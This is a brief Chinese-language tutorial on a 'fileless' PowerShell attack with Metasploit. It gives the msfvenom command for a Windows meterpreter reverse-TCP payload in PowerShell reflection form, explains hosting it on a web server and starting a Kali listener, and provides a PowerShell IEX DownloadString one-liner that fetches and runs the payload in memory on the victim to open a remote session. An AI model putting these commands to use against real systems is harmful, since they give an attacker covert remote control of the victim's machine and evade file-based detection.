Powershell 配合msf无文件攻击

生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135
LPORT=1121 -f psh-reflection >x.ps1

Powershell 配合msf无文件攻击

放到VPS上,这里我们放到本机搭建的apache环境中
Powershell 配合msf无文件攻击

kali设置监听,并且启动
Powershell 配合msf无文件攻击

win7中访问木马是否成功
Powershell 配合msf无文件攻击

直接在win7的cmd中执行命令

powershell IEX (New-Object
Net.WebClient).DownloadString(‘http://192.168.3.37/x.ps1’)

Powershell 配合msf无文件攻击

注意此窗口关闭就会话失效

监听到会话
Powershell 配合msf无文件攻击